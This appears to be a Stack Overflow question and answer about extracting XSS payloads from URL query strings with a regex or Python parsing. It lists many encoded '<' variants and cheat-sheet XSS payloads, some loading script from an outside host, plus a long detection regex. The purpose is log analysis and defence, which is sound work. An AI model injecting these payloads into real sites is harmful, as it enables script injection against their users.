2017-09-26

Regex to match all XSS payloads in the following list

I need a regex that will match all the XSS payloads in the following list (I'm not trying to filter XSS requests and log the URLs safely, I'm trying to pull the payload out of the URL itself and save it in a variable for later use):

http://www.example.com/subcat.php?id=24\x3c 
http://www.example.com/subcat.php?id=24\x3C 
http://www.example.com/subcat.php?id=24\u003c 
http://www.example.com/subcat.php?id=24\u003C 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24%3C 
http://www.example.com/subcat.php?id=24&lt 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24&LT 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24&#60 
http://www.example.com/subcat.php?id=24&#060 
http://www.example.com/subcat.php?id=24&#0060 
http://www.example.com/subcat.php?id=24&#00060 
http://www.example.com/subcat.php?id=24&#000060 
http://www.example.com/subcat.php?id=24&#0000060 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24&#x3c 
http://www.example.com/subcat.php?id=24&#x03c 
http://www.example.com/subcat.php?id=24&#x003c 
http://www.example.com/subcat.php?id=24&#x0003c 
http://www.example.com/subcat.php?id=24&#x00003c 
http://www.example.com/subcat.php?id=24&#x000003c 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24&#X3c 
http://www.example.com/subcat.php?id=24&#X03c 
http://www.example.com/subcat.php?id=24&#X003c 
http://www.example.com/subcat.php?id=24&#X0003c 
http://www.example.com/subcat.php?id=24&#X00003c 
http://www.example.com/subcat.php?id=24&#X000003c 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24&#x3C 
http://www.example.com/subcat.php?id=24&#x03C 
http://www.example.com/subcat.php?id=24&#x003C 
http://www.example.com/subcat.php?id=24&#x0003C 
http://www.example.com/subcat.php?id=24&#x00003C 
http://www.example.com/subcat.php?id=24&#x000003C 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24&#X3C 
http://www.example.com/subcat.php?id=24&#X03C 
http://www.example.com/subcat.php?id=24&#X003C 
http://www.example.com/subcat.php?id=24&#X0003C 
http://www.example.com/subcat.php?id=24&#X00003C 
http://www.example.com/subcat.php?id=24&#X000003C 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24<script>alert(123)</script> 
http://www.example.com/subcat.php?id=24<script>alert("hellox worldss");</script> 
http://www.example.com/subcat.php?id=24javascript:alert("hellox worldss") 
http://www.example.com/subcat.php?id=24<img src="javascript:alert('XSS');"> 
http://www.example.com/subcat.php?id=24<img src=javascript:alert(&quot;XSS&quot;)> 
http://www.example.com/subcat.php?id=24<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> 
http://www.example.com/subcat.php?id=24<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> 
http://www.example.com/subcat.php?id=24<IFRAME SRC="javascript:alert('XSS');"></IFRAME> 
http://www.example.com/subcat.php?id=24<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> 
http://www.example.com/subcat.php?id=24<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> 
http://www.example.com/subcat.php?id=24<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> 
http://www.example.com/subcat.php?id=24<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> 
http://www.example.com/subcat.php?id=24<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> 
http://www.example.com/subcat.php?id=24<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> 
http://www.example.com/subcat.php?id=24<<SCRIPT>alert("XSS");//<</SCRIPT> 
.... (for all see the URL) 

I managed to find one and modify it to match some of them, but not all:

<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*(?:\W*s\W*c\W*r\W*i\W*p\W*t|\W*f\W*o\W*r\W*m|\W*s\W*t\W*y\W*l\W*e|\W*s\W*v\W*g|\W*m\W*a\W*r\W*q\W*u\W*e\W*e|(?:\W*l\W*i\W*n\W*k|\W*o\W*b\W*j\W*e\W*c\W*t|\W*e\W*m\W*b\W*e\W*d|\W*a\W*p\W*p\W*l\W*e\W*t|\W*p\W*a\W*r\W*a\W*m|\W*i?\W*f\W*r\W*a\W*m\W*e|\W*b\W*a\W*s\W*e|\W*b\W*o\W*d\W*y|\W*m\W*e\W*t\W*a|\W*i\W*m\W*a?\W*g\W*e?|\W*v\W*i\W*d\W*e\W*o|\W*a\W*u\W*d\W*i\W*o|\W*b\W*i\W*n\W*d\W*i\W*n\W*g\W*s|\W*s\W*e\W*t|\W*i\W*s\W*i\W*n\W*d\W*e\W*x|\W*a\W*n\W*i\W*m\W*a\W*t\W*e)[^>\w])|(?:<\w[\s\S]*[\s\0\/]|['\"])(?:formaction|style|background|src|lowsrc|ping|on(?:d(?:e(?:vice(?:(?:orienta|mo)tion|proximity|found|light)|livery(?:success|error)|activate)|r(?:ag(?:e(?:n(?:ter|d)|xit)|(?:gestur|leav)e|start|drop|over)?|op)|i(?:s(?:c(?:hargingtimechange|onnect(?:ing|ed))|abled)|aling)|ata(?:setc(?:omplete|hanged)|(?:availabl|chang)e|error)|urationchange|ownloading|blclick)|Moz(?:M(?:agnifyGesture(?:Update|Start)?|ouse(?:PixelScroll|Hittest))|S(?:wipeGesture(?:Update|Start|End)?|crolledAreaChanged)|(?:(?:Press)?TapGestur|BeforeResiz)e|EdgeUI(?:C(?:omplet|ancel)|Start)ed|RotateGesture(?:Update|Start)?|A(?:udioAvailable|fterPaint))|c(?:o(?:m(?:p(?:osition(?:update|start|end)|lete)|mand(?:update)?)|n(?:t(?:rolselect|extmenu)|nect(?:ing|ed))|py)|a(?:(?:llschang|ch)ed|nplay(?:through)?|rdstatechange)|h(?:(?:arging(?:time)?ch)?ange|ecking)|(?:fstate|ell)change|u(?:echange|t)|l(?:ick|ose))|m(?:o(?:z(?:pointerlock(?:change|error)|(?:orientation|time)change|fullscreen(?:change|error)|network(?:down|up)load)|use(?:(?:lea|mo)ve|o(?:ver|ut)|enter|wheel|down|up)|ve(?:start|end)?)|essage|ark)|s(?:t(?:a(?:t(?:uschanged|echange)|lled|rt)|k(?:sessione|comma)nd|op)|e(?:ek(?:complete|ing|ed)|(?:lec(?:tstar)?)?t|n(?:ding|t))|u(?:ccess|spend|bmit)|peech(?:start|end)|ound(?:start|end)|croll|how)|b(?:e(?:for(?:e(?:(?:scriptexecu|activa)te|u(?:nload|pdate)|p(?:aste|rint)|c(?:opy|ut)|editfocus)|deactivate)|gin(?:Event)?)|oun(?:dary|ce)|l(?:ocked|ur)|roadcast|usy)|a(?:n(?:imation(?:iteration|start|end)|tennastatechange)|fter(?:(?:scriptexecu|upda)te|print)|udio(?:process|start|end)|d(?:apteradded|dtrack)|ctivate|lerting|bort)|DOM(?:Node(?:Inserted(?:IntoDocument)?|Removed(?:FromDocument)?)|(?:CharacterData|Subtree)Modified|A(?:ttrModified|ctivate)|Focus(?:Out|In)|MouseScroll)|r(?:e(?:s(?:u(?:m(?:ing|e)|lt)|ize|et)|adystatechange|pea(?:tEven)?t|movetrack|trieving|ceived)|ow(?:s(?:inserted|delete)|e(?:nter|xit))|atechange)|p(?:op(?:up(?:hid(?:den|ing)|show(?:ing|n))|state)|a(?:ge(?:hide|show)|(?:st|us)e|int)|ro(?:pertychange|gress)|lay(?:ing)?)|t(?:ouch(?:(?:lea|mo)ve|en(?:ter|d)|cancel|start)|ime(?:update|out)|ransitionend|ext)|u(?:s(?:erproximity|sdreceived)|p(?:gradeneeded|dateready)|n(?:derflow|load))|f(?:o(?:rm(?:change|input)|cus(?:out|in)?)|i(?:lterchange|nish)|ailed)|l(?:o(?:ad(?:e(?:d(?:meta)?data|nd)|start)?|secapture)|evelchange|y)|g(?:amepad(?:(?:dis)?connected|button(?:down|up)|axismove)|et)|e(?:n(?:d(?:Event|ed)?|abled|ter)|rror(?:update)?|mptied|xit)|i(?:cc(?:cardlockerror|infochange)|n(?:coming|valid|put))|o(?:(?:(?:ff|n)lin|bsolet)e|verflow(?:changed)?|pen)|SVG(?:(?:Unl|L)oad|Resize|Scroll|Abort|Error|Zoom)|h(?:e(?:adphoneschange|l[dp])|ashchange|olding)|v(?:o(?:lum|ic)e|ersion)change|w(?:a(?:it|rn)ing|heel)|key(?:press|down|up)|(?:AppComman|Loa)d|no(?:update|match)|Request|zoom))[\s\0]*=

For an example see here: it will only match the ones that contain a <script>, and for some of them it won't make a full match. Does anyone have a better regex that will match only the XSS payload in the URL, or a better way to find the XSS payload? Thanks in advance.


Possible duplicate of [Python library for XSS filtering?](https://stackoverflow.com/questions/901369/python-library-for-xss-filtering) – ctwheels


@ctwheels thanks! – wahwahwah


@ctwheels hey, I appreciate it, but that doesn't answer my question. I'm not trying to filter the XSS, I'm trying to extract the payload from the URL and save it as a variable. – wahwahwah

Answer


Found a way to do it simply with a built-in library:

    try:
        from urllib.parse import urlparse   # Python 3
    except ImportError:
        from urlparse import urlparse       # Python 2 (the module the answer used)

    def find_xss_script(url, query=4):
        # urlparse() returns (scheme, netloc, path, params, query, fragment);
        # index 4 is the query string, i.e. everything after '?'
        data = urlparse(url)
        return data[query]

Will return something like: id=24&#x000003c;
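As an added example (Python 3, not part of the original answer), the script below goes one step further than returning the whole query string: it locates the payload inside the parameter value and keeps it in its original encoding, which the question's list shows varies (literal `<`, `%3C`, `\x3c`, `\u003c`, `&lt`, `&LT`, `&#60`, `&#x3c`, with or without a trailing semicolon and with leading zeros). Two details are worth knowing before trusting the standard library here. `urllib.parse.urlparse` treats the first `#` as the start of the fragment, so for `...?id=24&#x3c` the query it returns is `id=24&` and the character reference is gone; and `urllib.parse.parse_qs` splits on every `&` and percent-decodes, so `&lt` becomes a new parameter and `%3C` loses its encoding. The example therefore cuts the query off by hand and only splits on `&` where a `name=` follows. The parameter name `id`, the `prefix`/`raw`/`decoded` keys and the sample URLs are assumptions made for this example.

```python
import html
import re
from urllib.parse import unquote

# The probe list in the question writes '<' in many ways: literal, %3C,
# JavaScript escapes (\x3c, \u003c) and HTML character references with or
# without the trailing semicolon and with leading zeros (&lt, &LT, &#0060,
# &#X000003c). normalize() folds all of them so the payload start is visible.
_JS_ESCAPE = re.compile(r'\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})')
_PAYLOAD_START = re.compile(r'<|javascript:', re.IGNORECASE)
# Split the query on '&' only when a 'name=' follows, so that '&lt', '&#60'
# or '&quot;' inside a payload are not mistaken for a new parameter.
_PARAM_SPLIT = re.compile(r'&(?=[\w.-]+=)')


def raw_query(url):
    """Everything after the first '?', untouched.

    urllib.parse.urlparse() is deliberately not used: it treats the first '#'
    as the start of the fragment, so for ...?id=24&#x3c it would return the
    query 'id=24&' and silently drop the character reference.
    """
    _, sep, query = url.partition('?')
    return query if sep else ''


def normalize(value):
    """Decode percent-encoding, JS escapes and HTML character references.

    Used only to *recognise* the payload; what is stored is the raw text,
    since the encoding itself is evidence of which filter bypass was tried.
    """
    value = unquote(value)                                       # %3C -> <
    value = _JS_ESCAPE.sub(
        lambda m: chr(int(m.group(1) or m.group(2), 16)), value)  # \x3c, \u003c -> <
    return html.unescape(value)                 # &lt &#60 &#x3c (';' optional) -> <


def split_payload(value):
    """Return (legitimate_prefix, payload) for one parameter value.

    The earliest raw offset whose decoded remainder starts with '<' or
    'javascript:' is taken as the payload boundary; scanning raw offsets keeps
    the payload in its original encoding. payload is None for a clean value.
    """
    for i in range(len(value)):
        if _PAYLOAD_START.match(normalize(value[i:])):
            return value[:i], value[i:]
    return value, None


def find_xss_payload(url, param='id'):
    """Extract the XSS payload carried by `param` in `url`, or None.

    Returns a dict with the untouched parameter prefix, the payload exactly as
    it appeared in the URL, and its decoded form. `param='id'` is an
    assumption taken from the question's URLs.
    """
    for pair in _PARAM_SPLIT.split(raw_query(url)):
        name, sep, value = pair.partition('=')
        if sep and name == param:
            prefix, payload = split_payload(value)
            if payload is None:
                return None
            return {'prefix': prefix, 'raw': payload, 'decoded': normalize(payload)}
    return None


if __name__ == '__main__':
    # Constructed sample URLs modelled on the question's list.
    for u in (
        'http://www.example.com/subcat.php?id=24&#x000003c',
        'http://www.example.com/subcat.php?id=24%3C',
        r'http://www.example.com/subcat.php?id=24\u003c',
        'http://www.example.com/subcat.php?id=24<script>alert(123)</script>',
        'http://www.example.com/subcat.php?id=24&page=2',
    ):
        print(u, '->', find_xss_payload(u))
```

`normalize()` is only a detection view: storing the raw payload preserves which encoding trick was used, which is usually the interesting part when these URLs come out of a log. Payload starts other than `<` and `javascript:` (for example a bare `data:` URL) are not covered because they do not begin a payload in the question's list; extend `_PAYLOAD_START` if your input differs.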